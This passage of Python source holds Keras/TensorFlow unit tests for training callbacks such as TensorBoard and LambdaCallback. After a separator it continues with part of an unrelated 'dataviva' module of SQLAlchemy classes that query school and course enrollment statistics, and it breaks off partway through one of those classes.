  self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
  (x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
      train_samples=TRAIN_SAMPLES,
      test_samples=TEST_SAMPLES,
      input_shape=(INPUT_DIM,),
      num_classes=NUM_CLASSES)
  y_test = keras.utils.to_categorical(y_test)
  y_train = keras.utils.to_categorical(y_train)

  def data_generator(train):
    """Yield endless (x, y) batches from the train or test split."""
    if train:
      max_batch_index = len(x_train) // BATCH_SIZE
    else:
      max_batch_index = len(x_test) // BATCH_SIZE
    i = 0
    while 1:
      if train:
        yield (x_train[i * BATCH_SIZE:(i + 1) * BATCH_SIZE],
               y_train[i * BATCH_SIZE:(i + 1) * BATCH_SIZE])
      else:
        yield (x_test[i * BATCH_SIZE:(i + 1) * BATCH_SIZE],
               y_test[i * BATCH_SIZE:(i + 1) * BATCH_SIZE])
      i += 1
      i %= max_batch_index

  # case: Sequential
  with self.cached_session():
    model = keras.models.Sequential()
    model.add(
        keras.layers.Dense(
            NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
    # non_trainable_weights: moving_variance, moving_mean
    model.add(keras.layers.BatchNormalization())
    model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
    model.compile(
        loss='categorical_crossentropy',
        optimizer='sgd',
        metrics=['accuracy'])
    tsb = keras.callbacks.TensorBoard(
        log_dir=temp_dir, histogram_freq=1, write_images=True,
        write_grads=True, batch_size=5)
    cbks = [tsb]
    # fit with validation data
    model.fit(
        x_train,
        y_train,
        batch_size=BATCH_SIZE,
        validation_data=(x_test, y_test),
        callbacks=cbks,
        epochs=3,
        verbose=0)
    # fit with validation data and accuracy
    model.fit(
        x_train,
        y_train,
        batch_size=BATCH_SIZE,
        validation_data=(x_test, y_test),
        callbacks=cbks,
        epochs=2,
        verbose=0)
    # fit generator with validation data
    model.fit_generator(
        data_generator(True),
        len(x_train),
        epochs=2,
        validation_data=(x_test, y_test),
        callbacks=cbks,
        verbose=0)
    # fit generator without validation data
    # histogram_freq must be zero
    tsb.histogram_freq = 0
    model.fit_generator(
        data_generator(True),
        len(x_train),
        epochs=2,
        callbacks=cbks,
        verbose=0)
    # fit generator with validation data and accuracy
    tsb.histogram_freq = 1
    model.fit_generator(
        data_generator(True),
        len(x_train),
        epochs=2,
        validation_data=(x_test, y_test),
        callbacks=cbks,
        verbose=0)
    # fit generator without validation data and accuracy
    tsb.histogram_freq = 0
    model.fit_generator(
        data_generator(True), len(x_train), epochs=2, callbacks=cbks)
    # The log directory must still exist after all training variants.
    assert os.path.exists(temp_dir)
@test_util.run_deprecated_v1
def test_TensorBoard_multi_input_output(self):
  """TensorBoard handles models with multiple inputs and outputs."""
  np.random.seed(1337)
  tmpdir = self.get_temp_dir()
  self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)
  with self.cached_session():
    filepath = os.path.join(tmpdir, 'logs')
    (x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
        train_samples=TRAIN_SAMPLES,
        test_samples=TEST_SAMPLES,
        input_shape=(INPUT_DIM,),
        num_classes=NUM_CLASSES)
    y_test = keras.utils.to_categorical(y_test)
    y_train = keras.utils.to_categorical(y_train)

    def data_generator(train):
      """Yield duplicated (x, y) batches to feed two inputs / two outputs."""
      if train:
        max_batch_index = len(x_train) // BATCH_SIZE
      else:
        max_batch_index = len(x_test) // BATCH_SIZE
      i = 0
      while 1:
        if train:
          # simulate multi-input/output models
          yield ([x_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE]] * 2,
                 [y_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE]] * 2)
        else:
          yield ([x_test[i * BATCH_SIZE: (i + 1) * BATCH_SIZE]] * 2,
                 [y_test[i * BATCH_SIZE: (i + 1) * BATCH_SIZE]] * 2)
        i += 1
        i %= max_batch_index

    # Two inputs merged by addition; two softmax outputs off a shared trunk.
    inp1 = keras.Input((INPUT_DIM,))
    inp2 = keras.Input((INPUT_DIM,))
    inp = keras.layers.add([inp1, inp2])
    hidden = keras.layers.Dense(2, activation='relu')(inp)
    hidden = keras.layers.Dropout(0.1)(hidden)
    output1 = keras.layers.Dense(NUM_CLASSES, activation='softmax')(hidden)
    output2 = keras.layers.Dense(NUM_CLASSES, activation='softmax')(hidden)
    model = keras.models.Model([inp1, inp2], [output1, output2])
    model.compile(loss='categorical_crossentropy',
                  optimizer='sgd',
                  metrics=['accuracy'])

    # we must generate new callbacks for each test, as they aren't stateless
    def callbacks_factory(histogram_freq):
      return [keras.callbacks.TensorBoard(log_dir=filepath,
                                          histogram_freq=histogram_freq,
                                          write_images=True, write_grads=True,
                                          batch_size=5)]

    # fit without validation data
    model.fit([x_train] * 2, [y_train] * 2, batch_size=BATCH_SIZE,
              callbacks=callbacks_factory(histogram_freq=0), epochs=3)
    # fit with validation data and accuracy
    model.fit([x_train] * 2, [y_train] * 2, batch_size=BATCH_SIZE,
              validation_data=([x_test] * 2, [y_test] * 2),
              callbacks=callbacks_factory(histogram_freq=1), epochs=2)
    # fit generator without validation data
    model.fit_generator(data_generator(True), len(x_train), epochs=2,
                        callbacks=callbacks_factory(histogram_freq=0))
    # fit generator with validation data and accuracy
    model.fit_generator(data_generator(True), len(x_train), epochs=2,
                        validation_data=([x_test] * 2, [y_test] * 2),
                        callbacks=callbacks_factory(histogram_freq=1))
    assert os.path.isdir(filepath)
@test_util.run_deprecated_v1
def test_Tensorboard_histogram_summaries_in_test_function(self):
  """Histogram (merged) summaries are written at validation steps."""

  class FileWriterStub(object):
    """Capture summaries in memory; record steps of merged-summary writes."""

    def __init__(self, logdir, graph=None):
      self.logdir = logdir
      self.graph = graph
      self.steps_seen = []

    def add_summary(self, summary, global_step):
      summary_obj = summary_pb2.Summary()
      # ensure a valid Summary proto is being sent
      if isinstance(summary, bytes):
        summary_obj.ParseFromString(summary)
      else:
        assert isinstance(summary, summary_pb2.Summary)
        summary_obj = summary
      # keep track of steps seen for the merged_summary op,
      # which contains the histogram summaries
      if len(summary_obj.value) > 1:
        self.steps_seen.append(global_step)

    def flush(self):
      pass

    def close(self):
      pass

  def _init_writer(obj):
    obj.writer = FileWriterStub(obj.log_dir)

  np.random.seed(1337)
  tmpdir = self.get_temp_dir()
  self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)
  (x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
      train_samples=TRAIN_SAMPLES,
      test_samples=TEST_SAMPLES,
      input_shape=(INPUT_DIM,),
      num_classes=NUM_CLASSES)
  y_test = keras.utils.to_categorical(y_test)
  y_train = keras.utils.to_categorical(y_train)
  with self.cached_session():
    model = keras.models.Sequential()
    model.add(
        keras.layers.Dense(
            NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
    # non_trainable_weights: moving_variance, moving_mean
    model.add(keras.layers.BatchNormalization())
    model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
    model.compile(
        loss='categorical_crossentropy',
        optimizer='sgd',
        metrics=['accuracy'])
    # Bug fix: the original monkey-patched TensorBoard._init_writer for the
    # whole process and never restored it, leaking the stub writer into any
    # test that runs afterwards.  Save and restore the real method.
    original_init_writer = keras.callbacks.TensorBoard._init_writer
    keras.callbacks.TensorBoard._init_writer = _init_writer
    self.addCleanup(setattr, keras.callbacks.TensorBoard, '_init_writer',
                    original_init_writer)
    tsb = keras.callbacks.TensorBoard(
        log_dir=tmpdir,
        histogram_freq=1,
        write_images=True,
        write_grads=True,
        batch_size=5)
    cbks = [tsb]
    # fit with validation data
    model.fit(
        x_train,
        y_train,
        batch_size=BATCH_SIZE,
        validation_data=(x_test, y_test),
        callbacks=cbks,
        epochs=3,
        verbose=0)
    # Six merged-summary writes are expected over the 3 training epochs.
    self.assertAllEqual(tsb.writer.steps_seen, [0, 1, 2, 3, 4, 5])
@test_util.run_deprecated_v1
def test_Tensorboard_histogram_summaries_with_generator(self):
  """histogram_freq > 0 with generators requires validation_steps."""
  np.random.seed(1337)
  tmpdir = self.get_temp_dir()
  self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)

  def generator():
    # One fixed random batch, yielded forever.
    x = np.random.randn(10, 100).astype(np.float32)
    y = np.random.randn(10, 10).astype(np.float32)
    while True:
      yield x, y

  with self.cached_session():
    model = testing_utils.get_small_sequential_mlp(
        num_hidden=10, num_classes=10, input_dim=100)
    model.compile(
        loss='categorical_crossentropy',
        optimizer='sgd',
        metrics=['accuracy'])
    tsb = keras.callbacks.TensorBoard(
        log_dir=tmpdir,
        histogram_freq=1,
        write_images=True,
        write_grads=True,
        batch_size=5)
    cbks = [tsb]
    # fit with validation generator
    model.fit_generator(
        generator(),
        steps_per_epoch=2,
        epochs=2,
        validation_data=generator(),
        validation_steps=2,
        callbacks=cbks,
        verbose=0)
    with self.assertRaises(ValueError):
      # fit with validation generator but no
      # validation_steps
      model.fit_generator(
          generator(),
          steps_per_epoch=2,
          epochs=2,
          validation_data=generator(),
          callbacks=cbks,
          verbose=0)
    self.assertTrue(os.path.exists(tmpdir))
@unittest.skipIf(
    os.name == 'nt',
    'use_multiprocessing=True does not work on windows properly.')
def test_LambdaCallback(self):
  """LambdaCallback's on_train_end hook fires when training completes."""
  with self.cached_session():
    np.random.seed(1337)
    (x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
        train_samples=TRAIN_SAMPLES,
        test_samples=TEST_SAMPLES,
        input_shape=(INPUT_DIM,),
        num_classes=NUM_CLASSES)
    y_test = keras.utils.to_categorical(y_test)
    y_train = keras.utils.to_categorical(y_train)
    model = keras.models.Sequential()
    model.add(
        keras.layers.Dense(
            NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
    model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
    model.compile(
        loss='categorical_crossentropy',
        optimizer='sgd',
        metrics=['accuracy'])
    # Start an arbitrary process that should run during model
    # training and be terminated after training has completed.
    e = threading.Event()

    def target():
      e.wait()

    t = threading.Thread(target=target)
    t.start()
    # on_train_end sets the event, releasing the waiting thread above.
    cleanup_callback = keras.callbacks.LambdaCallback(
        on_train_end=lambda logs: e.set())
    cbks = [cleanup_callback]
    model.fit(
        x_train,
        y_train,
        batch_size=BATCH_SIZE,
        validation_data=(x_test, y_test),
        callbacks=cbks,
        epochs=5,
        verbose=0)
    t.join()
    assert not t.is_alive()
def test_TensorBoard_with_ReduceLROnPlateau(self):
  """TensorBoard and ReduceLROnPlateau can coexist in one callback list."""
  with self.cached_session():
    temp_dir = self.get_temp_dir()
    self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
    (x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
        train_samples=TRAIN_SAMPLES,
        test_samples=TEST_SAMPLES,
        input_shape=(INPUT_DIM,),
        num_classes=NUM_CLASSES)
    y_test = keras.utils.to_categorical(y_test)
    y_train = keras.utils.to_categorical(y_train)
    model = testing_utils.get_small_sequential_mlp(
        num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
    model.compile(
        loss='binary_crossentropy', optimizer='sgd', metrics=['accuracy'])
    cbks = [
        keras.callbacks.ReduceLROnPlateau(
            monitor='val_loss', factor=0.5, patience=4, verbose=1),
        keras.callbacks.TensorBoard(log_dir=temp_dir)
    ]
    model.fit(
        x_train,
        y_train,
        batch_size=BATCH_SIZE,
        validation_data=(x_test, y_test),
        callbacks=cbks,
        epochs=2,
        verbose=0)
    # Only a smoke check: training completed and logs were written here.
    assert os.path.exists(temp_dir)
@test_util.run_deprecated_v1
def test_Tensorboard_batch_logging(self):
  """update_freq='batch' writes one scalar summary per batch."""

  class FileWriterStub(object):
    """Record every summary handed to the writer instead of writing files."""

    def __init__(self, logdir, graph=None):
      self.logdir = logdir
      self.graph = graph
      self.batches_logged = []
      self.summary_values = []
      self.summary_tags = []

    def add_summary(self, summary, step):
      self.summary_values.append(summary.value[0].simple_value)
      self.summary_tags.append(summary.value[0].tag)
      self.batches_logged.append(step)

    def flush(self):
      pass

    def close(self):
      pass

  temp_dir = self.get_temp_dir()
  self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)

  tb_cbk = keras.callbacks.TensorBoard(temp_dir, update_freq='batch')
  tb_cbk.writer = FileWriterStub(temp_dir)

  num_batches = 5
  for batch in range(num_batches):
    tb_cbk.on_batch_end(batch, {'acc': batch})

  # One 'batch_acc' summary per batch, carrying the batch index as value.
  self.assertEqual(tb_cbk.writer.batches_logged, list(range(num_batches)))
  self.assertEqual(tb_cbk.writer.summary_values,
                   [float(b) for b in range(num_batches)])
  self.assertEqual(tb_cbk.writer.summary_tags, ['batch_acc'] * num_batches)
@test_util.run_deprecated_v1
def test_Tensorboard_epoch_and_batch_logging(self):
  """Summaries carry batch_* or epoch_* tags according to update_freq."""

  class FileWriterStub(object):
    # Keeps the last batch- and epoch-tagged summaries it receives.

    def __init__(self, logdir, graph=None):
      self.logdir = logdir
      self.graph = graph

    def add_summary(self, summary, step):
      if 'batch_' in summary.value[0].tag:
        self.batch_summary = (step, summary)
      elif 'epoch_' in summary.value[0].tag:
        self.epoch_summary = (step, summary)

    def flush(self):
      pass

    def close(self):
      pass

  temp_dir = self.get_temp_dir()
  self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
  # update_freq='batch': on_batch_end emits a batch_-tagged summary.
  tb_cbk = keras.callbacks.TensorBoard(temp_dir, update_freq='batch')
  tb_cbk.writer = FileWriterStub(temp_dir)
  tb_cbk.on_batch_end(0, {'acc': 5.0})
  batch_step, batch_summary = tb_cbk.writer.batch_summary
  self.assertEqual(batch_step, 0)
  self.assertEqual(batch_summary.value[0].simple_value, 5.0)
  # update_freq='epoch': on_epoch_end emits an epoch_-tagged summary.
  tb_cbk = keras.callbacks.TensorBoard(temp_dir, update_freq='epoch')
  tb_cbk.writer = FileWriterStub(temp_dir)
  tb_cbk.on_epoch_end(0, {'acc': 10.0})
  epoch_step, epoch_summary = tb_cbk.writer.epoch_summary
  self.assertEqual(epoch_step, 0)
  self.assertEqual(epoch_summary.value[0].simple_value, 10.0)
@test_util.run_in_graph_and_eager_modes
def test_Tensorboard_eager(self):
  """TensorBoard callback works with eager execution enabled."""
  temp_dir = tempfile.mkdtemp(dir=self.get_temp_dir())
  self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
  (x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
      train_samples=TRAIN_SAMPLES,
      test_samples=TEST_SAMPLES,
      input_shape=(INPUT_DIM,),
      num_classes=NUM_CLASSES)
  y_test = keras.utils.to_categorical(y_test)
  y_train = keras.utils.to_categorical(y_train)
  model = testing_utils.get_small_sequential_mlp(
      num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
  # An optimizer object (not a string) is needed for eager-mode training.
  model.compile(
      loss='binary_crossentropy',
      optimizer=adam.AdamOptimizer(0.01),
      metrics=['accuracy'])
  cbks = [keras.callbacks.TensorBoard(log_dir=temp_dir)]
  model.fit(
      x_train,
      y_train,
      batch_size=BATCH_SIZE,
      validation_data=(x_test, y_test),
      callbacks=cbks,
      epochs=2,
      verbose=0)
  self.assertTrue(os.path.exists(temp_dir))
@test_util.run_deprecated_v1
def test_TensorBoard_update_freq(self):
  """update_freq of 'epoch', 'batch', or a sample count controls cadence."""

  class FileWriterStub(object):
    # Collects batch_- and epoch_-tagged summaries in separate lists.

    def __init__(self, logdir, graph=None):
      self.logdir = logdir
      self.graph = graph
      self.batch_summaries = []
      self.epoch_summaries = []

    def add_summary(self, summary, step):
      if 'batch_' in summary.value[0].tag:
        self.batch_summaries.append((step, summary))
      elif 'epoch_' in summary.value[0].tag:
        self.epoch_summaries.append((step, summary))

    def flush(self):
      pass

    def close(self):
      pass

  temp_dir = self.get_temp_dir()
  self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)

  # Epoch mode: batch ends write nothing; epoch ends write one summary.
  tb_cbk = keras.callbacks.TensorBoard(temp_dir, update_freq='epoch')
  tb_cbk.writer = FileWriterStub(temp_dir)
  tb_cbk.on_batch_end(0, {'acc': 5.0, 'size': 1})
  self.assertEqual(tb_cbk.writer.batch_summaries, [])
  tb_cbk.on_epoch_end(0, {'acc': 10.0, 'size': 1})
  self.assertEqual(len(tb_cbk.writer.epoch_summaries), 1)

  # Batch mode: every batch end writes a summary; epochs write none.
  tb_cbk = keras.callbacks.TensorBoard(temp_dir, update_freq='batch')
  tb_cbk.writer = FileWriterStub(temp_dir)
  tb_cbk.on_batch_end(0, {'acc': 5.0, 'size': 1})
  self.assertEqual(len(tb_cbk.writer.batch_summaries), 1)
  tb_cbk.on_batch_end(0, {'acc': 5.0, 'size': 1})
  self.assertEqual(len(tb_cbk.writer.batch_summaries), 2)
  self.assertFalse(tb_cbk.writer.epoch_summaries)

  # Integer mode: update_freq=20 with 'size': 10 per batch means one
  # summary every 2 batches (20 samples).
  tb_cbk = keras.callbacks.TensorBoard(temp_dir, update_freq=20)
  tb_cbk.writer = FileWriterStub(temp_dir)
  tb_cbk.on_batch_end(0, {'acc': 5.0, 'size': 10})
  self.assertFalse(tb_cbk.writer.batch_summaries)
  tb_cbk.on_batch_end(0, {'acc': 5.0, 'size': 10})
  self.assertEqual(len(tb_cbk.writer.batch_summaries), 1)
  tb_cbk.on_batch_end(0, {'acc': 5.0, 'size': 10})
  self.assertEqual(len(tb_cbk.writer.batch_summaries), 1)
  tb_cbk.on_batch_end(0, {'acc': 5.0, 'size': 10})
  self.assertEqual(len(tb_cbk.writer.batch_summaries), 2)
  tb_cbk.on_batch_end(0, {'acc': 10.0, 'size': 10})
  self.assertEqual(len(tb_cbk.writer.batch_summaries), 2)
  self.assertFalse(tb_cbk.writer.epoch_summaries)
def test_RemoteMonitorWithJsonPayload(self):
  """RemoteMonitor(send_as_json=True) posts epoch logs without error."""
  if requests is None:
    self.skipTest('`requests` required to run this test')
  with self.cached_session():
    (x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
        train_samples=TRAIN_SAMPLES,
        test_samples=TEST_SAMPLES,
        input_shape=(INPUT_DIM,),
        num_classes=NUM_CLASSES)
    y_test = keras.utils.np_utils.to_categorical(y_test)
    y_train = keras.utils.np_utils.to_categorical(y_train)
    model = keras.models.Sequential()
    model.add(
        keras.layers.Dense(
            NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
    model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
    model.compile(
        loss='categorical_crossentropy',
        optimizer='rmsprop',
        metrics=['accuracy'])
    cbks = [keras.callbacks.RemoteMonitor(send_as_json=True)]
    # Mock out the network call; only the callback plumbing is under test.
    with test.mock.patch.object(requests, 'post'):
      model.fit(
          x_train,
          y_train,
          batch_size=BATCH_SIZE,
          validation_data=(x_test, y_test),
          callbacks=cbks,
          epochs=1)
@test_util.run_deprecated_v1
def test_fit_generator_with_callback(self):
  """set_model must see a fully-built graph, optimizer ops included."""

  class TestCallback(keras.callbacks.Callback):

    def set_model(self, model):
      # Check the model operations for the optimizer operations that
      # the _make_train_function adds under a named scope for the
      # optimizer. This ensures the full model is populated before the
      # set_model callback is called.
      optimizer_name_scope = 'training/' + model.optimizer.__class__.__name__
      graph_def = ops.get_default_graph().as_graph_def()
      for node in graph_def.node:
        if node.name.startswith(optimizer_name_scope):
          return
      raise RuntimeError('The optimizer operations are not present in the '
                         'model graph when the Callback.set_model function '
                         'is called')

  np.random.seed(1337)

  def generator():
    # One fixed random batch, yielded forever.
    x = np.random.randn(10, 100).astype(np.float32)
    y = np.random.randn(10, 10).astype(np.float32)
    while True:
      yield x, y

  with self.cached_session():
    model = testing_utils.get_small_sequential_mlp(
        num_hidden=10, num_classes=10, input_dim=100)
    model.compile(
        loss='categorical_crossentropy',
        optimizer='sgd',
        metrics=['accuracy'])
    model.fit_generator(
        generator(),
        steps_per_epoch=2,
        epochs=1,
        validation_data=generator(),
        validation_steps=2,
        callbacks=[TestCallback()],
        verbose=0)
if __name__ == '__main__':
  # Delegate to the TensorFlow test runner when executed as a script.
  test.main()
| |
# -*- coding: utf-8 -*-
from dataviva.api.sc.models import Yc_sc, Ysc, Ybc_sc, Ybs, Ybsc, Ys
from dataviva.api.attrs.models import School, Bra, Course_sc
from dataviva import db
from sqlalchemy import desc, func, not_
class AllBasicCourse:
    """Latest-year enrollment figures across all basic courses (Yc_sc)."""

    def __init__(self):
        # Idiom fix: dropped the `= None` pre-assignments that were
        # immediately overwritten on the next lines.
        # Subquery for the most recent year present in Yc_sc; the main
        # query is restricted to that year, sorted by enrollment desc.
        self.max_year_subquery = db.session.query(func.max(Yc_sc.year))
        self.scholar_query = Yc_sc.query.order_by(Yc_sc.enrolled.desc()).filter(
            Yc_sc.year == self.max_year_subquery)

    def highest_enrolled_by_basic_course(self):
        """Return the enrollment count of the top course (404 if no rows)."""
        return self.scholar_query.first_or_404().enrolled

    def highest_enrolled_by_basic_course_name(self):
        """Return the name of the top-enrollment course (404 if no rows)."""
        bc = self.scholar_query.first_or_404()
        return bc.course_sc.name()
class AllScholar:
    """Latest-year enrollment figures across all schools (Ys)."""

    def __init__(self):
        # Idiom fix: dropped the `= None` pre-assignments that were
        # immediately overwritten on the next lines.
        self.max_year_subquery = db.session.query(func.max(Ys.year))
        self.scholar_query = Ys.query.order_by(Ys.enrolled.desc()).filter(
            Ys.year == self.max_year_subquery)

    def highest_enrolled_by_school(self):
        """Return the enrollment count of the top school (404 if no rows)."""
        return self.scholar_query.first_or_404().enrolled

    def highest_enrolled_by_school_name(self):
        """Return the name of the top-enrollment school (404 if no rows)."""
        sc = self.scholar_query.first_or_404()
        return sc.school.name()
class Basic_course:
    """Latest-year statistics for one basic course (Yc_sc), or across all
    courses when `course_sc_id` is None."""

    def __init__(self, course_sc_id):
        self._statistics = None
        self._sc = None  # cache for the first row of course_query
        self.course_sc_id = course_sc_id
        if self.course_sc_id is None:
            # No course selected: all courses in the overall latest year.
            self.max_year_subquery = db.session.query(func.max(Yc_sc.year))
            self.course_query = Yc_sc.query.join(Course_sc).filter(Yc_sc.year == self.max_year_subquery)
        else:
            # Restrict to this course's own most recent year of data.
            self.max_year_subquery = db.session.query(
                func.max(Yc_sc.year)).filter_by(course_sc_id=course_sc_id)
            self.course_query = Yc_sc.query.join(Course_sc).filter(
                Yc_sc.course_sc_id == self.course_sc_id,
                Yc_sc.year == self.max_year_subquery)

    def __sc__(self):
        # Lazily fetch and cache the first matching row (404 if none).
        if not self._sc:
            sc = self.course_query.first_or_404()
            self._sc = sc
        return self._sc

    def course_name(self):
        course = self.__sc__()
        return course.course_sc.name()

    def course_classes(self):
        course_classes = self.__sc__()
        return course_classes.classes

    def course_age(self):
        course_age = self.__sc__()
        return course_age.age

    def course_enrolled(self):
        course_enrolled = self.__sc__()
        return course_enrolled.enrolled

    def course_average_class_size(self):
        # NOTE(review): plain '/' — this truncates if both columns are ints
        # under Python 2; confirm the intended rounding behavior.
        total_class_number = self.__sc__().classes
        total_enrolled_number = self.__sc__().enrolled
        return total_enrolled_number / total_class_number

    def course_year(self):
        course_year = self.__sc__()
        return course_year.year

    def location_name(self):
        # NOTE(review): self.bra_id is only set by location-aware
        # subclasses; calling this on a plain Basic_course would fail.
        return Bra.query.filter(Bra.id == self.bra_id).one().name()

    def state_name(self):
        # The first 3 characters of the bra id are used as the state id.
        # NOTE(review): also relies on subclass-provided self.bra_id.
        return Bra.query.filter(Bra.id == self.bra_id[:3]).one().name()
class Basic_course_by_location(Basic_course):
    """Basic_course statistics narrowed to one location (table Ybc_sc)."""

    def __init__(self, course_sc_id, bra_id):
        Basic_course.__init__(self, course_sc_id)
        self.bra_id = bra_id
        # Override the parent's subquery/query with location-aware versions:
        # latest year with data for this course at this location.
        self.max_year_subquery = db.session.query(
            func.max(Ybc_sc.year)).filter_by(course_sc_id=course_sc_id, bra_id=bra_id)
        self.course_query = Ybc_sc.query.join(Course_sc).filter(
            Ybc_sc.course_sc_id == self.course_sc_id,
            Ybc_sc.year == self.max_year_subquery,
            Ybc_sc.bra_id == self.bra_id)
class Basic_course_school(Basic_course):
    """Per-school statistics (Ysc) for one basic course in its latest year."""

    def __init__(self, course_sc_id):
        Basic_course.__init__(self, course_sc_id)
        self._sc_count = None  # cache for __sc_count__
        self.max_year_subquery = db.session.query(
            func.max(Ysc.year)).filter_by(course_sc_id=course_sc_id)
        self._sc_sorted_by_enrollment = None  # cache, sorted desc by enrollment
        self.total_schools_query = Ysc.query.filter(
            Ysc.course_sc_id == self.course_sc_id,
            Ysc.year == self.max_year_subquery)

    def __sc_list__(self):
        # Lazily fetch and cache all matching school rows.
        # NOTE(review): caches into self._sc, the same slot the parent uses
        # for a single row — confirm the two usages never mix.
        if not self._sc:
            sc = self.total_schools_query.all()
            self._sc = sc
        return self._sc

    def __sc_count__(self):
        if not self._sc_count:
            # Bug fix: the original called list.count() with no argument,
            # which raises TypeError; len() is what was intended.
            sc_count = len(self.__sc_list__())
            self._sc_count = sc_count
        return self._sc_count

    def __sc_sorted_by_enrollment__(self):
        # Sort the cached list in place, most-enrolled first.
        if not self._sc_sorted_by_enrollment:
            self._sc_sorted_by_enrollment = self.__sc_list__()
            self._sc_sorted_by_enrollment.sort(key=lambda sc: sc.enrolled, reverse=True)
        return self._sc_sorted_by_enrollment

    def school_name(self):
        """Name of the school with the highest enrollment."""
        sc = self.__sc_sorted_by_enrollment__()[0]
        return sc.school.name()

    def school_enrolled(self):
        """Enrollment count of the most-enrolled school."""
        school_enrolled = self.__sc_sorted_by_enrollment__()[0]
        return school_enrolled.enrolled

    def school_count(self):
        """Total number of schools offering this course (SQL COUNT)."""
        school_count = self.total_schools_query.count()
        return school_count
class Basic_course_school_by_location(Basic_course_school):
    """Per-school statistics (Ybsc) for one course within one location."""

    def __init__(self, course_sc_id, bra_id):
        Basic_course_school.__init__(self, course_sc_id)
        self.bra_id = bra_id
        # Override the parent's queries with location-aware (Ybsc) versions.
        self.max_year_subquery = db.session.query(
            func.max(Ybsc.year)).filter_by(course_sc_id=course_sc_id, bra_id=bra_id)
        self.total_schools_query = Ybsc.query.filter(
            Ybsc.course_sc_id == self.course_sc_id,
            Ybsc.year == self.max_year_subquery,
            Ybsc.bra_id == self.bra_id)
class Basic_course_city(Basic_course):
    """City-level enrollment (Ybc_sc rows with 9-char bra ids) for a course."""

    def __init__(self, course_sc_id):
        Basic_course.__init__(self, course_sc_id)
        self._sc_city = None  # cache of all city rows
        self._city_sorted_by_enrollment = None  # cache, sorted desc by enrollment
        # bra_id_len == 9 selects city-level location rows.
        self.most_enrolled_city_query = Ybc_sc.query.join(Bra).filter(
            Ybc_sc.course_sc_id == self.course_sc_id,
            Ybc_sc.year == self.max_year_subquery,
            Ybc_sc.bra_id_len == 9)

    def __city_list__(self):
        # Lazily fetch and cache all city rows for this course.
        if not self._sc_city:
            city_list = self.most_enrolled_city_query.all()
            self._sc_city = city_list
        return self._sc_city

    def __city_sorted_by_enrollment__(self):
        # Sort the cached list in place, most-enrolled city first.
        if not self._city_sorted_by_enrollment:
            self._city_sorted_by_enrollment = self.__city_list__()
            self._city_sorted_by_enrollment.sort(key=lambda sc: sc.enrolled, reverse=True)
        return self._city_sorted_by_enrollment

    def city_name(self):
        """Name of the city with the highest enrollment."""
        city_name = self.__city_sorted_by_enrollment__()[0]
        return city_name.bra.name()

    def city_state(self):
        """State abbreviation of the most-enrolled city."""
        city_state = self.__city_sorted_by_enrollment__()[0]
        return city_state.bra.abbreviation

    def city_enrolled(self):
        """Enrollment count of the most-enrolled city."""
        city_enrolled = self.__city_sorted_by_enrollment__()[0]
        return city_enrolled.enrolled
class Basic_course_by_state(Basic_course_city):
    """Course statistics aggregated by state (bra_id_len == 3) within a location."""

    def __init__(self, course_sc_id, bra_id):
        Basic_course_city.__init__(self, course_sc_id)
        self.bra_id = bra_id
        # Latest year with data for this course at this location.
        self.max_year_subquery = db.session.query(
            func.max(Ybsc.year)).filter_by(course_sc_id=course_sc_id, bra_id=bra_id)
        # str() guards against non-string bra_ids, matching the prefix
        # filter used by Basic_course_city_by_location.
        self.most_enrolled_city_query = Ybc_sc.query.join(Bra).filter(
            Ybc_sc.course_sc_id == self.course_sc_id,
            Ybc_sc.year == self.max_year_subquery,
            Ybc_sc.bra_id.like(str(self.bra_id) + '%'),
            Ybc_sc.bra_id_len == 3)

    def location_rank(self):
        """Name of the state with the most enrollment."""
        return self.__city_sorted_by_enrollment__()[0].bra.name()

    def location_enrolled(self):
        """Enrollment count of the top state."""
        return self.__city_sorted_by_enrollment__()[0].enrolled
class Basic_course_city_by_location(Basic_course_city):
    """City-level course statistics restricted to a location id prefix."""
    def __init__(self, course_sc_id, bra_id):
        Basic_course_city.__init__(self, course_sc_id)
        self.bra_id = bra_id
        # Latest year with data for this course at this location.
        self.max_year_subquery = db.session.query(
            func.max(Ybsc.year)).filter_by(course_sc_id=course_sc_id, bra_id=bra_id)
        # Cities (bra_id_len == 9) whose id starts with the given location id.
        self.most_enrolled_city_query = Ybc_sc.query.join(Bra).filter(
            Ybc_sc.course_sc_id == self.course_sc_id,
            Ybc_sc.year == self.max_year_subquery,
            Ybc_sc.bra_id.like(str(self.bra_id)+'%'),
            Ybc_sc.bra_id_len == 9)
class LocationSchool:
    """School enrollment statistics for a single location (*bra_id*)."""

    def __init__(self, bra_id):
        self.bra_id = bra_id
        # Lazy caches for query results.
        self._sc_list = None
        self._sc_sorted_by_enrollment = None
        self.max_year_query = db.session.query(func.max(Ybs.year)).filter_by(bra_id=bra_id)
        self.sc_query = db.session.query(
            func.sum(Ybs.enrolled).label("enrolled"),
            School).join(School).filter(
                Ybs.bra_id == self.bra_id,
                Ybs.year == self.max_year_query).group_by(Ybs.school_id)

    def __sc_list__(self):
